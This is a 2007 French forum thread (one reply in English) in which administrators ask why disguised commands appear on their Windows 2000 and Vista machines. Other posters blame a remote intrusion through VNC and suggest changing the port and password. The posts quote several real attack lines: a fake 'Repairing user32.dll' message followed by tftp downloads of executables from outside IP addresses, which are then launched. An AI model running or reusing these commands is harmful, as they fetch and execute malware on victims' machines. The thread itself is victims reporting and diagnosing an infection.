FORUM Tom's Hardware » Le monde de Windows » Drivers & OS » [2k server] lancement bizarre

[2k server] lancement bizarre

Il y a 393 utilisateurs connus et inconnus. Pour voir la liste des connectés connus, cliquez ici

Mot :   Pseudo :  

Bas de page
Auteur
 Sujet : [2k server] lancement bizarre

Membre-ane
Profil : comme son nom l'indique
Plus d'informations

salut
sur mon serveur de domaine 2k ya un truc bizarre qui se produit vers 15h et 3h.
2 recherche windows s'éxécute avec la recherche:

Citation :

r%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 70.54.0.16 GET vmmhyfd.exe & start vmmhyfd&

Citation :

r%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 70.54.0.16 GET bglz.exe & start bglz&

1 recheche vide
2 gestionnaire de tâches

J'ai pensé à un virus mais mon antivirus n'a rien trouvé (trend server)

une idée ?
(rien dans les tâches planifié - rien de bizarre dans les services)

Message édité par fourbe le 16-03-2007 à 10:33:24

---------------
[:sige]Sooz[:sige]
[:fourbe:3] Rofl, j'ai du taff au boulot maintenant [:fourbe:3]

Membre-ane
Plus d'informations

up!

---------------
Plus d'informations

Hello. I am sorry but my French is very bad. I am having the same exact computer problem that you are. This is the only reference to the problem that I found on the internet. I found your post by copy and pasting the IP address, which is the same one that comes up in my "run" dialog box in Windows. Unfortunately I do not know anything more than you do, but hopefully we can find the program on the computer that is causing this.

Membre-ane
Plus d'informations

hello !
thank you for your message.

If I find a solution, be sure I will share it with you ;)

sorry for my english, i'm just PPC_addict

---------------
Membre-ane
Plus d'informations

mode francais:
Alors ce message est enfait un message d'un pirate qui se rate.
Sauf qu'aujourdhui (enfin samedi) il ne s'est pas raté.
il effectue enfait une prise de controle à distance, essaye d'envoyer un "Windows+R" (éxécuter) pour lancer la commande.
Cela envoit 2 virus sur la machine:
msgscy.exe
mscgy.exe
ca prend 50% d'uc par user sur la machine.
Moi c'est arrivé sur mon serveur TSE, jvous laisse imaginer le resultat....

---------------
Plus d'informations

J'ai le meme probleme sous Vista.
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 67.71.3.90 GET qisnqk.exe & start qisnqk&
Voici ce qu'il me lance quelque fois dnas la journée, souvent vers 20h et la à la pause de midi.
D'apres ce que j'ai lu je ne retrouve plus le lien malheuresement ca viendrai d'une faille avec VNC.
Souci, j'ai ce probleme que depus que je suis sous vista poru ma part et avant sous xp sp2 j'avias le serveur vnc a longueur de journée et rien.

Membre-ane
Plus d'informations

normal
le xp xp2 intégre une maj qui empéche ce virus de s'éxécuter
pareil avec 2k sp4.
jte conseil de changer de port vnc et de mot de passe.

---------------

Aller à :

Annonces Google
Publicité
Actualités relatives

Windows 2000 Server, la fin de la fin pour 2007

Publié le 19 December 2003

C'est en 2007 que Microsoft prévoit de mettre fin au support de Windows 2000, soit 7 ans après son lancement. D'ici là, les ponts seront toutefois peu à peu coupés, avec un début en 2004, date à laquelle Windows 2000 Server et Advanced Server ne Lire la suite

Reportage photo : le lancement de la PlayStation 3

Publié le 23 March 2007

Nous publions aujourd’hui le récit de la soirée de lancement de la PlayStation 3. Nous en profitons pour inaugurer une nouvelle forme d’article : le reportage photo : C’est au pied de la Tour Eiffel que Sony avait convié les joueurs parisiens po Lire la suite

Partenaire : le lancement de l'iPhone comme si vous y étiez !

Publié le 02 July 2007

Notre partenaire Bestofmicro vient de publier un reportage photo couvrant le lancement américain du tant attendu iPhone d’Apple. Deux équipes sur place, deux Apple Store différents et plusieurs heures passées sur les trottoirs : le dispositif en plac ... Lire la suite

UT 2007 : le jeu de lancement de la PS3

Publié le 23 December 2005

Selon le site The Inquirer qui cite lui-même l’édition de janvier 2006 de PlayStation Magazine, Unreal Tournament 2007 fera partie des jeux accompagnant le lancement de la nouvelle console de Sony. Il semblerait même que ce soit Lire la suite

Les derniers tests

Le Home Cinema avec un graphique intégré ?

Publié le 03 October 2008

Le Radeon HD 3200 (chipset 780G) et le GeForce 8200 (chipset MCP78S) sont les premiers circuits vidéo intégrés à pouvoir accélérer la lecture du Blu-ray. Nous examinons en détail les performances de ces deux solutions. Lire la suite

Charts cartes graphiques Q3 2008 : 101 cartes testées

Publié le 29 September 2008

Les charts de 101 cartes graphiques anciennes et récentes sous 9 applications, avec au total 6767 scores. Quel gain attendre du remplacement de votre carte graphique par un nouveau modèle dans chaque application/résolution et en moyenne ? Lire la suite

Upgrader son portable en 9 leçons

Publié le 29 September 2008

Ergonomie, performances, autonomie, une dizaine d’améliorations sont réalisables sur votre PC Portable. Laissez-vous guider par la rédaction pour reprendre en mains votre vieille machine. Lire la suite

Que choisir ? Home Cinema 5.1 ou projecteur de son ?

Publié le 25 September 2008

Faut-il craquer pour un ensemble 5.1 ou pour une barre de son ? Découvrez les forces et faiblesses comparées de chaque système. Lire la suite